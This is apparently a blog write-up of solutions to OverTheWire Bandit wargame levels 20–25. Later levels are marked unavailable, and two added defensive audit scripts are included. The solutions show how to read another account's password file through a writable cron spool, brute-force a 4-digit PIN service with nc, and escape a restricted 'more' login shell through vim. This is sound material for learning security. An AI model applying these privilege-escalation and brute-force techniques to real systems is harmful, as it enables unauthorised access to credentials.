OverTheWire.org Wargames – Bandit – Level 20 to Level 29

Initially I posted the password in this article. When I moved the article here from the old site, I thought I should remove it.

OverTheWire.org is one of the good sites offering wargames. In this context, a wargame is a game specifically designed to help people learn and practice security concepts in a fun way. One of the wargame categories provided by OverTheWire is Bandit, which is aimed at absolute beginners.

This writeup contains my solutions to the OverTheWire Bandit challenges. The solutions here cover level 20 and above.

How to Play

Bandit, like other games, is organized in levels. We start playing at level 0 and try to “beat” or “finish” it. Finishing a level yields the information needed to start the next level.

There are several things you can try when you are unsure how to continue:

  • First, if you know a command, but don’t know how to use it, try the manual (man page) by entering “man <command>” (without the quotes). e.g. if you know about the “ls” command, type: man ls. The “man” command also has a manual, try it. Press q to quit the man command.
  • Second, if there is no man page, the command might be a shell built-in. In that case use the “help <X>” command. E.g. help cd
  • Also, your favorite search-engine is your friend.
  • Lastly, if you are still stuck, you can join us on IRC

Level 20

ssh [email protected]

pass:

There is an executable file “suconnect”. It makes a connection to localhost on the port we specify as a command-line argument. It then reads a line of text from the connection and compares it to the password of the current level. If the password is correct, it transmits the password for level 21.

All we need to do is run nc listening on a random port, then connect to it with suconnect. We send the password through the nc session and suconnect sends back the new password.

$ nc -l 13510 < /etc/bandit_pass/bandit20 &
$ ./suconnect 13510

Level 21

ssh [email protected]

pass:

There is a cron job that we need to look at. /etc/cron.d contains several cron files; the one we are after is cronjob_bandit22, which looks promising. Inspect it to see what it does.

The cron job executes the script /usr/bin/cronjob_bandit22.sh, which dumps /etc/bandit_pass/bandit22 to the file /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv.

$ cat /etc/cron.d/cronjob_bandit22
$ cat /usr/bin/cronjob_bandit22.sh
$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Level 22

ssh [email protected]

pass:

Another cron job. This time, the script run by the cron job copies /etc/bandit_pass/bandit23 to a file in /tmp. There is no need to guess the filename: we can reproduce the way the script derives it.

$ cat /etc/cron.d/cronjob_bandit23
$ cat /usr/bin/cronjob_bandit23.sh
$ cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)

Level 23

ssh [email protected]

pass:

Another cronjob.

In this level, we need to create our own shell script. The cron job script executes (and then deletes) the scripts in /var/spool/bandit24. So we can place a script in that directory which dumps the password from /etc/bandit_pass/bandit24 to any location we choose. We just need to make sure the script is executable.

The script we create:

#!/bin/bash

# Runs as bandit24 through the cron job: copy the password to a file we can read
cat /etc/bandit_pass/bandit24 > /tmp/bandit24xathpass
chmod 777 /tmp/bandit24xathpass

Then we do:

cat /tmp/bandit24xathpass
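
The level works because a job running as one account executes whatever other accounts drop into its directory. The following check is an added example, not part of the original post or of the OverTheWire scripts: it audits such a directory for write access by others and for files a trusted UID does not own. The function name, finding labels and demo directory are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original post.
# audit_spool_dir DIR TRUSTED_UID
# Checks a directory whose files a cron job executes under another account.
# Prints one finding per line; returns 0 if clean, 1 if anything was found.
audit_spool_dir() {
    dir=$1
    trusted_uid=$2
    findings=$(
        # -prune limits the test to DIR itself; -perm -0002 means writable by "other"
        find "$dir" -prune -perm -0002 -exec echo WORLD_WRITABLE_DIR {} \;
        # -perm -0020 means writable by the owning group
        find "$dir" -prune -perm -0020 -exec echo GROUP_WRITABLE_DIR {} \;
        # Files inside DIR owned by anyone other than the trusted account
        find "$dir" -type f ! -user "$trusted_uid" -exec echo FOREIGN_FILE {} \;
    )
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

# Constructed demo: a temp directory opened up to everyone, then locked down.
demo=$(mktemp -d)
chmod 1777 "$demo"
printf '#!/bin/sh\nid\n' > "$demo/job.sh"
audit_spool_dir "$demo" "$(id -u)" || echo "=> fix permissions before any job runs files from here"
chmod 700 "$demo"
audit_spool_dir "$demo" "$(id -u)" && echo "=> clean"
rm -rf "$demo"
```

A runner that must accept files from other users should at least refuse to execute anything reported as FOREIGN_FILE unless that owner is explicitly expected.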

Level 24

ssh [email protected]

pass:

Another tedious level.

There is a service running on port 30002. It asks for two words: the password for bandit25 and a secret 4-digit pincode. The two words are separated by a space. Our only option is to brute-force all 10000 combinations.

This is a one-line command, arranged over multiple lines for clarity.

pass=$(cat /etc/bandit_pass/bandit24)
for i in {0000..9999}; do {
   if 
      echo "$pass $i" | nc localhost 30002 | grep Wrong > /dev/null;
   then 
      echo $i;
   else 
      echo "$pass $i" | nc localhost 30002 && exit;
   fi 
}
done

Level 25

ssh [email protected]

pass:

Logging in to bandit26 from bandit25 should be easy. But when we try to log in, something strange happens. That is because the shell is not /bin/bash. Let’s see what it is.

$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

It’s /usr/bin/showtext. What does it contain?

$ cat /usr/bin/showtext
#!/bin/sh

more ~/text.txt
exit 0

It runs more on text.txt. It turns out we can escape to ‘vim’ by pressing ‘v’. Once in vim, invoke this.

:r /etc/bandit_pass/bandit26
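
The restricted login "shell" above is only as restrictive as the programs it starts. The following check is an added example, not part of the original post: it reads a passwd file and reports login shells that are scripts starting a pager or editor with interactive escapes. The ROOT prefix argument, the program list and the finding label are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original post.
# audit_login_shells PASSWD_FILE [ROOT]
# Reports accounts whose login shell is a script that starts a pager or editor.
# ROOT is a hypothetical path prefix so the check can run on a constructed tree.
audit_login_shells() {
    passwd_file=$1
    root=${2:-}
    # passwd field 1 is the user name, field 7 the login shell
    cut -d: -f1,7 "$passwd_file" | while IFS=: read -r user shell; do
        script=$root$shell
        [ -f "$script" ] || continue
        # Only inspect text scripts, recognised by a #! first line
        head -n 1 "$script" | grep -q '^#!' || continue
        # Programs known to offer an editor or shell escape when run interactively
        for prog in more less man vi vim; do
            if grep -Eq "^[[:space:]]*(exec[[:space:]]+)?${prog}([[:space:]]|\$)" "$script"; then
                echo "ESCAPABLE_LOGIN_SHELL user=$user shell=$shell runs=$prog"
            fi
        done
    done
}

# Constructed demo tree holding the passwd entry and the script quoted above.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/usr/bin"
printf '#!/bin/sh\n\nmore ~/text.txt\nexit 0\n' > "$demo_root/usr/bin/showtext"
printf '%s\n' 'bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext' \
    > "$demo_root/passwd"
audit_login_shells "$demo_root/passwd" "$demo_root"
rm -rf "$demo_root"
```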

Level 26

ssh [email protected]

pass:

Not Available Yet.

Level 27

ssh [email protected]

pass:

Not Available Yet.

Level 28

ssh [email protected]

pass:

Not Available Yet.

Level 29

ssh [email protected]

pass:

Not Available Yet.

About Author

xathrya

A man who is obsessed with low-level technology.
